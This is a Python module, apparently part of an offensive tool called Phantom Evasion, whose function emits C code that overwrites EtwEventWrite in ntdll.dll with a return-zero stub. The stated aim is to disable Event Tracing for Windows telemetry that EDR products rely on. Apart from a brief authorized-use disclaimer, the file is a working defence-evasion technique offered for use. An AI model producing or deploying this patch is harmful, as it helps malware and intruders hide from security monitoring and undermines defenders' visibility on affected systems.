"""
Phantom Evasion - ETW (Event Tracing for Windows) Bypass

LEGAL DISCLAIMER:
For authorized penetration testing and security research ONLY.
Users must have explicit written permission from the target system owner.
"""

from typing import Dict, Any


def generate_etw_patch() -> Dict[str, Any]:
    """Generate C code that patches ``EtwEventWrite`` to suppress ETW telemetry.

    The patch overwrites the first bytes of the ``EtwEventWrite`` function in
    ntdll.dll with a minimal stub that immediately returns zero (STATUS_SUCCESS)
    without logging any event:
        ``33 C0``  – xor eax, eax
        ``C3``     – ret

    This prevents the process from emitting ETW events that EDR products
    collect via the ``Microsoft-Windows-Threat-Intelligence`` provider.

    Returns:
        Dict with keys ``code``, ``description``, ``layer``, ``name``.
    """
    code = r"""\
#ifndef __PHANTOM_PATCH_ETW__
#define __PHANTOM_PATCH_ETW__
// ETW Bypass – Patch EtwEventWrite – generated by Phantom Evasion
// Layer 3 – ETW/AMSI Bypass
// Patches EtwEventWrite in ntdll.dll with: xor eax,eax; ret
// This silences ETW telemetry collection used by EDR products.

#include <windows.h>

static BOOL patch_etw_event_write(void) {
    HMODULE hNtdll = GetModuleHandleA("ntdll.dll");
    if (!hNtdll) return FALSE;

    FARPROC pEtwEventWrite = GetProcAddress(hNtdll, "EtwEventWrite");
    if (!pEtwEventWrite) return FALSE;

    // Patch bytes: xor eax, eax (33 C0); ret (C3)
    BYTE patch[] = { 0x33, 0xC0, 0xC3 };

    DWORD old_protect = 0;
    if (!VirtualProtect((LPVOID)pEtwEventWrite, sizeof(patch),
                        PAGE_EXECUTE_READWRITE, &old_protect))
        return FALSE;

    memcpy((LPVOID)pEtwEventWrite, patch, sizeof(patch));
    VirtualProtect((LPVOID)pEtwEventWrite, sizeof(patch),
                   old_protect, &old_protect);

    // Flush the instruction cache to ensure the CPU sees the new bytes
    FlushInstructionCache(GetCurrentProcess(),
                          (LPVOID)pEtwEventWrite, sizeof(patch));
    return TRUE;
}
#endif /* __PHANTOM_PATCH_ETW__ */
"""

    return {
        "code": code,
        "description": "Patch EtwEventWrite (xor eax,eax; ret) to disable ETW logging",
        "layer": "Layer 3 - ETW/AMSI Bypass",
        "name": "patch_etw",
    }
